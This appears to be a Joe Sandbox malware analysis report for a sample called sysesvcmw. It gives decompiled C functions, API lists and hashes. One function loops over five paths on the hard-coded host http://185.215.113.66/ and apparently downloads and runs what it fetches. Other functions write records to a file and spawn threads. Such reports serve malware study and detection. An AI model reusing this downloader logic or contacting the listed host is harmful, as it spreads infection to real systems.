                                                                                                                                                                                                                                                                                    • Opcode ID: 9d90b313020425024ef4211a7d2766a6eb2190f61c39788aa0d4f477df4a16fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 1183846ab50913c5dc9fb8b6007841b1b3d3e2f8f7d5b2678c7a8c905f18143c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d90b313020425024ef4211a7d2766a6eb2190f61c39788aa0d4f477df4a16fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E110DB0E4020A9BDF10CFD0D945BEEBB74FB48704F108019E611B7280D7B89645CF99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                    			E00404970(intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				signed int _v5;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				signed int _v13;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                                                    				long _v36;
                                                                                                                                                                                                                                                                                    				signed char _t76;
                                                                                                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                                                                                                    				signed char _t91;
                                                                                                                                                                                                                                                                                    				signed int _t141;
                                                                                                                                                                                                                                                                                    				void* _t158;
                                                                                                                                                                                                                                                                                    				void* _t159;
                                                                                                                                                                                                                                                                                    				void* _t160;
                                                                                                                                                                                                                                                                                    				void* _t169;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection(0x416398);
                                                                                                                                                                                                                                                                                    				_t111 = _a12;
                                                                                                                                                                                                                                                                                    				_t76 = E0040B270(_a12, _a16);
                                                                                                                                                                                                                                                                                    				_t159 = _t158 + 8;
                                                                                                                                                                                                                                                                                    				if((_t76 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    					_t79 = E0040B210(_t111, _a12);
                                                                                                                                                                                                                                                                                    					_t160 = _t159 + 4;
                                                                                                                                                                                                                                                                                    					_v12 = _t79;
                                                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    						_v5 = 1;
                                                                                                                                                                                                                                                                                    						_v13 = 0;
                                                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							_t169 = _v20 -  *0x4163b4; // 0x0
                                                                                                                                                                                                                                                                                    							if(_t169 >= 0) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v24 = _v20 * 0x110 +  *0x4163b0;
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                                                                                                                                                                                                                    								memcpy(_v24, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                                    								E00408C70( *((intOrPtr*)(_v24 + 0x108)));
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x108)) = E00408CE0(_a12, _a16);
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                                                                                                                                                                                                                    								E00408C70( *((intOrPtr*)(_v24 + 0x100)));
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x100)) = E0040AB80( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                                    								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                                                                                                                                                                                                                    								E00405C90( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                                    								_t160 = _t160 + 0x3c;
                                                                                                                                                                                                                                                                                    								_v13 = 1;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    							_t91 = E004044E0(_a16, _v12, _a12, _a16, 1);
                                                                                                                                                                                                                                                                                    							_t160 = _t160 + 0x10;
                                                                                                                                                                                                                                                                                    							__eflags = _t91 & 0x000000ff;
                                                                                                                                                                                                                                                                                    							if((_t91 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    								 *0x4163b4 = 0;
                                                                                                                                                                                                                                                                                    								_v5 = 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00408C70(_v12);
                                                                                                                                                                                                                                                                                    						__eflags = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if((_v5 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    							_v28 = CreateFileW(0x4165c8, 0x40000000, 0, 0, 2, 2, 0);
                                                                                                                                                                                                                                                                                    							__eflags = _v28 - 0xffffffff;
                                                                                                                                                                                                                                                                                    							if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_v32 = 0;
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									__eflags = _v32 -  *0x4163b4; // 0x0
                                                                                                                                                                                                                                                                                    									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t87 =  *0x4163b0; // 0x0
                                                                                                                                                                                                                                                                                    									_t88 =  *0x4163b0; // 0x0
                                                                                                                                                                                                                                                                                    									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                                                                                                                                                                                                                    									_t141 = _v32 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t141;
                                                                                                                                                                                                                                                                                    									_v32 = _t141;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								FlushFileBuffers(_v28);
                                                                                                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				LeaveCriticalSection(0x416398);
                                                                                                                                                                                                                                                                                    				return _v5;
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x00404978
                                                                                                                                                                                                                                                                                    0x00404981
                                                                                                                                                                                                                                                                                    0x0040498b
                                                                                                                                                                                                                                                                                    0x0040498f
                                                                                                                                                                                                                                                                                    0x00404994
                                                                                                                                                                                                                                                                                    0x0040499c
                                                                                                                                                                                                                                                                                    0x004049a6
                                                                                                                                                                                                                                                                                    0x004049ab
                                                                                                                                                                                                                                                                                    0x004049ae
                                                                                                                                                                                                                                                                                    0x004049b5
                                                                                                                                                                                                                                                                                    0x004049bb
                                                                                                                                                                                                                                                                                    0x004049bf
                                                                                                                                                                                                                                                                                    0x004049c3
                                                                                                                                                                                                                                                                                    0x004049d5
                                                                                                                                                                                                                                                                                    0x004049d8
                                                                                                                                                                                                                                                                                    0x004049de
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004049f3
                                                                                                                                                                                                                                                                                    0x00404a02
                                                                                                                                                                                                                                                                                    0x00404a11
                                                                                                                                                                                                                                                                                    0x00404a1d
                                                                                                                                                                                                                                                                                    0x00404a38
                                                                                                                                                                                                                                                                                    0x00404a44
                                                                                                                                                                                                                                                                                    0x00404a54
                                                                                                                                                                                                                                                                                    0x00404a68
                                                                                                                                                                                                                                                                                    0x00404a96
                                                                                                                                                                                                                                                                                    0x00404aa2
                                                                                                                                                                                                                                                                                    0x00404abe
                                                                                                                                                                                                                                                                                    0x00404ac3
                                                                                                                                                                                                                                                                                    0x00404ac6
                                                                                                                                                                                                                                                                                    0x00404a04
                                                                                                                                                                                                                                                                                    0x004049d2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004049d2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404a02
                                                                                                                                                                                                                                                                                    0x00404ad5
                                                                                                                                                                                                                                                                                    0x00404ad7
                                                                                                                                                                                                                                                                                    0x00404ae7
                                                                                                                                                                                                                                                                                    0x00404aec
                                                                                                                                                                                                                                                                                    0x00404af2
                                                                                                                                                                                                                                                                                    0x00404af4
                                                                                                                                                                                                                                                                                    0x00404af6
                                                                                                                                                                                                                                                                                    0x00404b00
                                                                                                                                                                                                                                                                                    0x00404b00
                                                                                                                                                                                                                                                                                    0x00404af4
                                                                                                                                                                                                                                                                                    0x00404b08
                                                                                                                                                                                                                                                                                    0x00404b14
                                                                                                                                                                                                                                                                                    0x00404b16
                                                                                                                                                                                                                                                                                    0x00404b36
                                                                                                                                                                                                                                                                                    0x00404b39
                                                                                                                                                                                                                                                                                    0x00404b3d
                                                                                                                                                                                                                                                                                    0x00404b3f
                                                                                                                                                                                                                                                                                    0x00404b51
                                                                                                                                                                                                                                                                                    0x00404b54
                                                                                                                                                                                                                                                                                    0x00404b5a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404b6b
                                                                                                                                                                                                                                                                                    0x00404b81
                                                                                                                                                                                                                                                                                    0x00404b92
                                                                                                                                                                                                                                                                                    0x00404b4b
                                                                                                                                                                                                                                                                                    0x00404b4b
                                                                                                                                                                                                                                                                                    0x00404b4e
                                                                                                                                                                                                                                                                                    0x00404b4e
                                                                                                                                                                                                                                                                                    0x00404b9e
                                                                                                                                                                                                                                                                                    0x00404ba8
                                                                                                                                                                                                                                                                                    0x00404ba8
                                                                                                                                                                                                                                                                                    0x00404b3d
                                                                                                                                                                                                                                                                                    0x00404b16
                                                                                                                                                                                                                                                                                    0x004049b5
                                                                                                                                                                                                                                                                                    0x00404bb3
                                                                                                                                                                                                                                                                                    0x00404bc1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00416398,?,?,00000000,0040A547,006A0266,?,0040A563,00000000,0040B81C,?), ref: 00404981
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(004165C8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00404B30
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00404B92
                                                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32 ref: 00404B9E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00404BA8
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00416398,?,?,00000000,0040A547,006A0266,?,0040A563,00000000,0040B81C,?), ref: 00404BB3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2945370292-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1fef3702c3e63574ed35e0dfe7bc8173a088fc6aeaa4d3467fc2287270656826
                                                                                                                                                                                                                                                                                    • Instruction ID: 17ab94b32ecbdd43ae5be3672dc601cffb9a037549fc2dffe68e9228f76f24ff
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fef3702c3e63574ed35e0dfe7bc8173a088fc6aeaa4d3467fc2287270656826
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 487182B5A00109ABCB04CF94D985FEFB7B5FB88304F148169EA05B7381C779E941CBA9
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040BBA0(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				signed int* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v12 = _a4;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                                    				E0040BB20( &(_v12[1]), _v12);
                                                                                                                                                                                                                                                                                    				if(_a12 != 0) {
                                                                                                                                                                                                                                                                                    					_v12[7] = E00408B60(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                                                                                                                                                                                                                    					if(_v12[7] != 0) {
                                                                                                                                                                                                                                                                                    						_v16 = CreateThread(0, _a8, _a12, _a16, 0, _a20);
                                                                                                                                                                                                                                                                                    						if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                                                                                                                                                                                                                    							 *_v12 =  *_v12 + 1;
                                                                                                                                                                                                                                                                                    							if(_a24 != 0) {
                                                                                                                                                                                                                                                                                    								_t49 = GetCurrentProcess();
                                                                                                                                                                                                                                                                                    								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				LeaveCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                                                    0x0040bba6
                                                                                                                                                                                                                                                                                    0x0040bbb1
                                                                                                                                                                                                                                                                                    0x0040bc88
                                                                                                                                                                                                                                                                                    0x0040bc8e
                                                                                                                                                                                                                                                                                    0x0040bc8e
                                                                                                                                                                                                                                                                                    0x0040bbba
                                                                                                                                                                                                                                                                                    0x0040bbc4
                                                                                                                                                                                                                                                                                    0x0040bbce
                                                                                                                                                                                                                                                                                    0x0040bbda
                                                                                                                                                                                                                                                                                    0x0040bbff
                                                                                                                                                                                                                                                                                    0x0040bc09
                                                                                                                                                                                                                                                                                    0x0040bc25
                                                                                                                                                                                                                                                                                    0x0040bc2c
                                                                                                                                                                                                                                                                                    0x0040bc3c
                                                                                                                                                                                                                                                                                    0x0040bc4a
                                                                                                                                                                                                                                                                                    0x0040bc50
                                                                                                                                                                                                                                                                                    0x0040bc5c
                                                                                                                                                                                                                                                                                    0x0040bc6e
                                                                                                                                                                                                                                                                                    0x0040bc6e
                                                                                                                                                                                                                                                                                    0x0040bc74
                                                                                                                                                                                                                                                                                    0x0040bc74
                                                                                                                                                                                                                                                                                    0x0040bc2c
                                                                                                                                                                                                                                                                                    0x0040bc09
                                                                                                                                                                                                                                                                                    0x0040bc82
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BBC4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB20: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BB60
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB20: CloseHandle.KERNEL32(?), ref: 0040BB79
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040BC1F
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040BC5C
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040BC67
                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32 ref: 0040BC6E
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040BC82
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 33c17659471092c2b756b62356fc1a2425cda27d656a6ab2967af513715b6e0f
                                                                                                                                                                                                                                                                                    • Instruction ID: 02f9ad1cbe3c42a1849ee7ac27792547e5d144dd11b2029950602c6e4363e771
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c17659471092c2b756b62356fc1a2425cda27d656a6ab2967af513715b6e0f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E311074900208EFDB04DF94D899F9E7BB5FF48304F108159E905A7391D775AA91CF98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00407980(signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				L0040EDF8();
                                                                                                                                                                                                                                                                                    				_a4 = _a4 | _a4;
                                                                                                                                                                                                                                                                                    				_a8 = _a8 | _a8;
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				L0040EDF8();
                                                                                                                                                                                                                                                                                    				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                                                                                                                                                                                                                    				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				L0040EDF8();
                                                                                                                                                                                                                                                                                    				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                                                                                                                                                                                                                    				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                                                                                                                                                                                                                    				return _a4;
                                                                                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                                                                                    0x0040798d
                                                                                                                                                                                                                                                                                    0x0040799e
                                                                                                                                                                                                                                                                                    0x004079a7
                                                                                                                                                                                                                                                                                    0x004079aa
                                                                                                                                                                                                                                                                                    0x004079c0
                                                                                                                                                                                                                                                                                    0x004079dc
                                                                                                                                                                                                                                                                                    0x004079e5
                                                                                                                                                                                                                                                                                    0x004079e8
                                                                                                                                                                                                                                                                                    0x004079fe
                                                                                                                                                                                                                                                                                    0x00407a1a
                                                                                                                                                                                                                                                                                    0x00407a23
                                                                                                                                                                                                                                                                                    0x00407a26
                                                                                                                                                                                                                                                                                    0x00407a32

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                                    • Instruction ID: 2093b42955e45bd62e61740d1c7aadb5a606cc23c90c49e7bcc84aa687a307ef
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C1121325005286B9B10EF5EC4826CABBD6EF84361B15C136FC2CDF359D634D9515BD4
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                    			E00405CF0() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                                                    				char _v148;
                                                                                                                                                                                                                                                                                    				intOrPtr _v152;
                                                                                                                                                                                                                                                                                    				intOrPtr _v156;
                                                                                                                                                                                                                                                                                    				intOrPtr _v160;
                                                                                                                                                                                                                                                                                    				intOrPtr _v164;
                                                                                                                                                                                                                                                                                    				intOrPtr _v168;
                                                                                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                                                                                    				signed char _t35;
                                                                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v168 = 0x411130;
                                                                                                                                                                                                                                                                                    				_v164 = 0x411134;
                                                                                                                                                                                                                                                                                    				_v160 = 0x411138;
                                                                                                                                                                                                                                                                                    				_v156 = 0x41113c;
                                                                                                                                                                                                                                                                                    				_v152 = 0x411140;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					_v172 = 0;
                                                                                                                                                                                                                                                                                    					while(_v172 < 5) {
                                                                                                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t45 + _v172 * 4 - 0xa4)));
                                                                                                                                                                                                                                                                                    						_push("http://185.215.113.66/");
                                                                                                                                                                                                                                                                                    						wsprintfA( &_v148, "%s%s");
                                                                                                                                                                                                                                                                                    						_t35 = E0040D440( &_v148, _t45 + _v172 * 4 - 0x28);
                                                                                                                                                                                                                                                                                    						_t46 = _t46 + 0x18;
                                                                                                                                                                                                                                                                                    						if((_t35 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    							E0040D4F0( &_v148, 0);
                                                                                                                                                                                                                                                                                    							_t46 = _t46 + 8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v172 = _v172 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0xdbba0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x00405cf9
                                                                                                                                                                                                                                                                                    0x00405d02
                                                                                                                                                                                                                                                                                    0x00405d05
                                                                                                                                                                                                                                                                                    0x00405d08
                                                                                                                                                                                                                                                                                    0x00405d0b
                                                                                                                                                                                                                                                                                    0x00405d0e
                                                                                                                                                                                                                                                                                    0x00405d11
                                                                                                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                                                                                                    0x00405d17
                                                                                                                                                                                                                                                                                    0x00405d1a
                                                                                                                                                                                                                                                                                    0x00405d1d
                                                                                                                                                                                                                                                                                    0x00405d27
                                                                                                                                                                                                                                                                                    0x00405d31
                                                                                                                                                                                                                                                                                    0x00405d3b
                                                                                                                                                                                                                                                                                    0x00405d45
                                                                                                                                                                                                                                                                                    0x00405d4f
                                                                                                                                                                                                                                                                                    0x00405d54
                                                                                                                                                                                                                                                                                    0x00405d5a
                                                                                                                                                                                                                                                                                    0x00405d75
                                                                                                                                                                                                                                                                                    0x00405d83
                                                                                                                                                                                                                                                                                    0x00405d96
                                                                                                                                                                                                                                                                                    0x00405d97
                                                                                                                                                                                                                                                                                    0x00405da8
                                                                                                                                                                                                                                                                                    0x00405dc3
                                                                                                                                                                                                                                                                                    0x00405dc8
                                                                                                                                                                                                                                                                                    0x00405dd1
                                                                                                                                                                                                                                                                                    0x00405ddc
                                                                                                                                                                                                                                                                                    0x00405de1
                                                                                                                                                                                                                                                                                    0x00405de1
                                                                                                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                                                                                                    0x00405deb
                                                                                                                                                                                                                                                                                    0x00405deb

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleep$wsprintf
                                                                                                                                                                                                                                                                                    • String ID: %s%s$http://185.215.113.66/
                                                                                                                                                                                                                                                                                    • API String ID: 3195947292-2646931437
